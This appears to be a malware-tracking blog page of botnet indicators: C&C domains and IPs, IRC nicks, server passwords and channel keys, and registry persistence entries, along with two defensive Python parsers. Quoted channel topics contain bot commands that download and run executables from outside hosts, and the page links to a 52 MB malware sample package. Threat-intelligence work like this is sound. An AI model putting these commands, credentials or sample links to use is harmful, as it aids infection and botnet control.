dc.studyingcenter-org.com(botnet hosted in China Beijing Chinanet Hebei Province Network)

C&C hosts:
dc.studyingcenter-org.com 123.183.217.32
dc.tvteam.info
dc.babypin.net
Outgoing connection to remote server: dc.studyingcenter-org.com TCP port 5943 (repeated 4 times)
Registry Changes by all processes
Create or Open Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Taskman" = c:\RECYCLER\R-1-5-21-1482476501-1644491937-682003330-1013\winfixer.exe

bnet.doesntexist.org(botnet hosted in Ecuador Quito Puntonet S.a)

DNS Lookup Host Name IP Address
xeonbox.homeip.net 200.105.228.106
webcache.dyndns.info 127.0.0.1 (loopback)
bnet.doesntexist.org 200.105.228.106
Outgoing connection to remote server: xeonbox.homeip.net TCP port 8888
Outgoing connection to remote server: webcache.dyndns.info TCP port 8888
Outgoing connection to remote server: xeonbox.homeip.net TCP port 8888
Remote Host / Port Number
174.132.221.20 80
200.105.228.106 8888
IRC registration:
NICK usr331420
USER root 8 * : some

urcdw.zavoddebila.com(botnet hosted in United States Fullerton Staminus Communications)

urcdw.zavoddebila.com DNS_TYPE_A 72.20.14.38
C&C: 72.20.14.38:33333
Nick: {NOVA}[USA][XP-SP3]610119
Username: VirUs VirUs "" "lol" :My_Name_iS_PIG_and_Iam_A_GaY
Joined Channel: ##Turb0-XXX##
PRIVMSG #d4 :Done..
PRIVMSG #d2 :Done..
Channel Topic for Channel ##Turb0-XXX##: "!NAZELturbo http://thenaturemedia.in/install.48691.exe ifasfa264.exe | !NAZELturbo http://7arhive.com/setup585.exe afasfa4.exe | !NAZELturbo http://img103.herosh.com/2011/02/09/666929080.gif fsaf24.exe | !NAZELturbo http://img104.herosh.com/2011/02/08/547715969.gif micro1.exe"
Private Message to Channel ##Turb0-XXX##: "Executed process "fsaf24.exe"."
Private Message to Channel ##Turb0-XXX##: "Download

m3rcil3ss.co.cc(botnet hosted in Turkey Netinternet-net)

m3rcil3ss.co.cc DNS_TYPE_A 212.252.34.199
C&C: 212.252.34.199:6667
Nick: [AUS|XP|620207]
Username: onfkyav
Server Pass: m3rc
Joined Channel: #m3rc with Password kxfcrt
Channel Topic for Channel #m3rc: ".p2p" (set by ccc on Tue Dec 28 08:36:24)
Private Message to Channel #m3rc: "[p2p]: Spreading to p2p folders."
Private Message to User [AUS|XP|620207]: "VERSION"
Now talking in #2k38
Process Created:
Topic is

pantylost.mooo.com(botnet hosted in China Beijing Chinanet Gansu Province Network)

Botnet C&C IRC. All of the following names resolve to 60.165.98.198:
pantylost.mooo.com
marinehh.twilightparadox.com
stockingag.jumpingcrab.com
pantylost.crabdance.com
onthebreak.UglyAs.com
headmefc.AsSexyAs.com
computercc.ignorelist.com
sandtp.chickenkiller.com
greenbarc.IsTheBe.st
ringc.strangled.net
C&C: 60.165.98.198:8684
NICK [N00_USA_XP_39922187]
USER SP2-917 * 0 :COMPUTERNAME
Now talking in #blue3
Topic is '|.ddosstop -s|.stop -s|.patcher http://58.240.104.57:9008/logo.gif 0 -s|.shttp ftp://ccc:1@60.10.179.100:6054/282.gif
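The IRC sessions above (m3rcil3ss, zavoddebila, pantylost) share a recognisable shape: a NICK that packs a country tag, an OS tag and a bot id into brackets, a JOIN with a channel key, and a channel topic that is really a command line of `!`/`.` directives with download URLs. The following analyzer is an added example, not code from the original post: it parses IRC protocol lines, flags nicks in that bracketed format, and pulls the topic commands and URLs out. The sample session lines are constructed for the demo; the hosts, URLs and channel keys in them are placeholders, not the indicators listed above.

```python
import re

# Constructed IRC session lines modelled on the bot registrations and channel
# topics quoted in the reports above. Nick formats follow the page; hosts,
# URLs, keys and numbers are placeholders, not captured traffic.
SAMPLE_IRC = """\
PASS m3rc
NICK [AUS|XP|620207]
USER onfkyav 8 * :onfkyav
JOIN #m3rc kxfcrt
:ccc!ccc@host TOPIC #m3rc :.p2p
NICK {NOVA}[USA][XP-SP3]610119
JOIN ##Turb0-XXX##
:srv 332 bot ##Turb0-XXX## :!NAZELturbo http://dl.example.invalid/install.exe a.exe | !NAZELturbo http://img.example.invalid/1.gif b.exe
NICK [N00_USA_XP_39922187]
USER SP2-917 * 0 :COMPUTERNAME
JOIN #blue3
:srv 332 bot #blue3 :|.ddosstop -s|.stop -s|.patcher http://198.51.100.7:9008/logo.gif 0 -s
NICK alice
USER alice 0 * :Alice
JOIN #python
"""

# Bot nicks on this page start with '[' or '{' and pack a country tag, an OS tag
# (XP, SP3, ...) and a multi-digit bot id into the nick. Heuristic, not a signature.
BOT_NICK = re.compile(r"^[\[{].*?(?:XP|2K|W7|VISTA|SP\d).*?\d{4,}", re.I)
# Topic commands: '!word' or '.word' at the start of the topic or after a space/pipe.
TOPIC_CMD = re.compile(r"(?:^|[\s|])([!.][A-Za-z]\w*)")
URL = re.compile(r"(?:https?|ftp)://[^\s|\"']+")


def parse_irc_line(line):
    """Split one IRC protocol line into (prefix, command, params)."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line.partition(" ")
    if " :" in line:  # trailing parameter may contain spaces
        head, _, trailing = line.partition(" :")
        params = head.split() + [trailing]
    else:
        params = line.split()
    return prefix, params[0].upper(), params[1:]


def analyze_irc(text):
    """Return indicators of bot-style IRC behaviour found in a session capture."""
    report = {"server_pass": None, "bot_nicks": [], "channels": [],
              "topic_commands": [], "download_urls": []}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        _, cmd, params = parse_irc_line(line)
        if cmd == "PASS" and params:
            report["server_pass"] = params[0]
        elif cmd == "NICK" and params and BOT_NICK.match(params[0]):
            report["bot_nicks"].append(params[0])
        elif cmd == "JOIN" and params:
            # A second parameter is the channel key (the "with Password" seen above).
            chan = params[0] + (f" (key {params[1]})" if len(params) > 1 else "")
            report["channels"].append(chan)
        elif cmd in ("TOPIC", "332") and params:
            # TOPIC <chan> :<text> or numeric 332 <me> <chan> :<text>; topic is last param
            topic = params[-1]
            report["topic_commands"].extend(TOPIC_CMD.findall(topic))
            report["download_urls"].extend(URL.findall(topic))
    return report


if __name__ == "__main__":
    for key, value in analyze_irc(SAMPLE_IRC).items():
        print(f"{key}: {value}")
```

The nick regex only covers the bracketed format quoted on this page; a plain nick like `usr331420` from the bnet.doesntexist.org session would need a separate rule (for example NICK/USER mismatch or a realname equal to the host name), so treat the topic-command and URL extraction as the more durable signal.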

around 52 MB of exe files

Here is another malware package, around 52 MB, containing multiple samples. Download: http://0b975bb5.tinylinks.co

dq.javagames7.com(malware hosted in United States Dallas Theplanet.com Internet Services Inc)

DNS Lookup Host Name IP Address
dq.javagames7.com 174.121.62.122
Outgoing connection to remote server: dq.javagames7.com TCP port 8800 (repeated 3 times)
Registry Changes by all processes
Create or Open Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Taskman" = C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-1413\syitm.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon "Shell" = explorer.exe,C:\RECYCLER\S-1-5-21-0243556031-888888379-781863308-1413\syitm.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Note: the Winlogon "Shell" value is normally just explorer.exe; appending a second path makes Winlogon start the dropped binary alongside Explorer at every logon, and "Taskman" is normally absent altogether. The RECYCLER\<SID> folder is used to hide the file among the Recycle Bin's per-user directories.

69.162.99.180(malware hosted in United States Dallas Limestone Networks Inc)

Panel: Outgoing connection to remote server: 69.162.99.180 TCP port 8083
Registry Changes by all processes
Create or Open Changes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "Network" = rundll32.exe "C:\Dokumente und Einstellungen\Administrator\sys32config.dll",network
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections "DefaultConnectionSettings" = [REG_BINARY, size: 91 bytes]
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections "SavedLegacySettings" = [REG_BINARY, size: 91 bytes]
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings "AutoConfigURL" = http://win32.z3nos.com:2011/set.pac
Reads
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes "MS Shell Dlg 2"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
Note: the AutoConfigURL entry points the user's proxy settings at an attacker-hosted PAC file, so the browser's traffic can be selectively routed through a proxy of the operator's choosing; the persistence is a rundll32 Run entry calling the "network" export of the dropped DLL.
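Every sandbox excerpt on this page is the same flattened report format: DNS answers, "Outgoing connection to remote server" lines, and registry writes with the key path, value name and data run together on one line. The script below is an added example, not code from the original post or from the sandbox: it pulls the DNS answers, C&C endpoints and registry writes out of a report in that format and flags the persistence and proxy-hijack entries that recur above (Winlogon Taskman and Shell, Run keys, AutoConfigURL) while ignoring benign noise such as EnableBalloonTips. The sample report, its hosts, IPs, SIDs and paths are constructed for the demo and are not indicators.

```python
import re

# Constructed sample in the flattened sandbox-report style used throughout this
# page. Hosts, IPs, SIDs and paths are invented for the demo and are not IOCs.
SAMPLE_REPORT = (
    "dq.example.invalid DNS_TYPE_A 198.51.100.22 198.51.100.22:8800 "
    "Outgoing connection to remote server: dq.example.invalid TCP port 8800 "
    "Outgoing connection to remote server: dq.example.invalid TCP port 8800 "
    "Outgoing connection to remote server: 203.0.113.9 TCP port 8083 "
    "Registry Changes by all processes Create or Open Changes "
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon "
    "\u201cTaskman\u201d = C:\\RECYCLER\\S-1-5-21-0000000000-111111111-222222222-1001\\syitm.exe "
    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon "
    "\u201cShell\u201d = explorer.exe,C:\\RECYCLER\\S-1-5-21-0000000000-111111111-222222222-1001\\syitm.exe "
    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run "
    "\u201cNetwork\u201d = rundll32.exe \u201cC:\\Documents and Settings\\Administrator\\sys32config.dll\u201d,network "
    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings "
    "\u201cAutoConfigURL\u201d = http://pac.example.invalid:2011/set.pac "
    "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced "
    "\u201cEnableBalloonTips\u201d = [REG_DWORD, value: 00000001] "
    "Reads HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CTF\\SystemShared \u201cCUAS\u201d"
)

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
# "host ip", "host DNS_TYPE_A ip" and "host ip: x.x.x.x", the three DNS shapes on the page
DNS_RE = re.compile(
    r"\b([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})\s+(?:DNS_TYPE_A\s+|ip:\s*)?(" + IPV4 + r")\b",
    re.I)
CONN_RE = re.compile(r"Outgoing connection to remote server:\s+(\S+)\s+(?:TCP|UDP) port\s+(\d+)")
HOSTPORT_RE = re.compile(r"\b(" + IPV4 + r"):(\d{2,5})\b")
# key path, quoted value name, "=" and data; data runs until the next HKEY_ key or "Reads"
REG_RE = re.compile(
    r'(HKEY_[A-Z_]+\\[^"]+?)\s+"([^"]+)"\s+=\s+(.+?)(?=\s+HKEY_|\s+Reads\b|\s*$)', re.S)


def extract_iocs(report):
    """Parse one flattened sandbox report into DNS pairs, C&C endpoints and registry writes."""
    text = report.replace("\u201c", '"').replace("\u201d", '"')  # curly quotes from the CMS
    dns = sorted(set(DNS_RE.findall(text)))
    conns = {(h, int(p)) for h, p in CONN_RE.findall(text)}
    conns |= {(h, int(p)) for h, p in HOSTPORT_RE.findall(text)}
    registry = [(k, n, v.strip()) for k, n, v in REG_RE.findall(text)]
    return {"dns": dns, "connections": sorted(conns), "registry": registry}


def flag_persistence(entries):
    """Flag registry writes that give the sample persistence or hijack the proxy settings."""
    findings = []
    for key, name, value in entries:
        k, n, v = key.lower(), name.lower(), value.lower()
        if k.endswith("\\winlogon") and n == "shell" and v != "explorer.exe":
            findings.append(f"Winlogon Shell hijacked: {value}")
        elif k.endswith("\\winlogon") and n == "taskman":
            findings.append(f"Winlogon Taskman set (normally absent): {value}")
        elif k.endswith("\\currentversion\\run"):
            note = " (runs from RECYCLER)" if "\\recycler\\" in v else ""
            findings.append(f"Run key {name}: {value}{note}")
        elif k.endswith("\\internet settings") and n == "autoconfigurl":
            findings.append(f"Proxy auto-config (AutoConfigURL) hijack: {value}")
    return findings


if __name__ == "__main__":
    iocs = extract_iocs(SAMPLE_REPORT)
    for section in ("dns", "connections"):
        print(section, iocs[section])
    for finding in flag_persistence(iocs["registry"]):
        print("FLAG:", finding)
```

Paste any of the report blobs from this page into `extract_iocs` (with the backslashes restored, as in the cleaned-up entries above) to get a deduplicated endpoint list for blocking; the registry rules are deliberately narrow and will not catch persistence mechanisms the page does not show.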

master.easyanticheat.net(malware hosted in Sweden Power Och Random T-lane Ab)

DNS Lookup Host Name IP Address
master.easyanticheat.net 80.67.10.234
Outgoing connection to remote server: master.easyanticheat.net TCP port 50301
Outgoing connection to remote server: 82.203.212.9 TCP port 50301
Outgoing connection to remote server: 78.47.251.150 TCP port 50301
Registry Changes by all processes
Create or Open Changes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced "EnableBalloonTips" = [REG_DWORD, value: 00000001]
Reads
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle

zonetf.com(gbot hosted in United States Scranton Network Operations Center Inc)

DNS Lookup Host Name IP Address
iphonefirmware.com 174.121.193.76
127.0.0.1 127.0.0.1
zonetf.com 96.9.169.85
onloneservermonitoring.com 64.191.90.101
www.google.com 209.85.149.106
www.yahoo.com 87.248.122.122
Opened listening TCP connection on port: 55980
Outgoing connection to remote server: iphonefirmware.com TCP port 80
Outgoing connection to remote server: zonetf.com TCP port 80
Outgoing connection to remote server: onloneservermonitoring.com TCP port 80
Outgoing connection to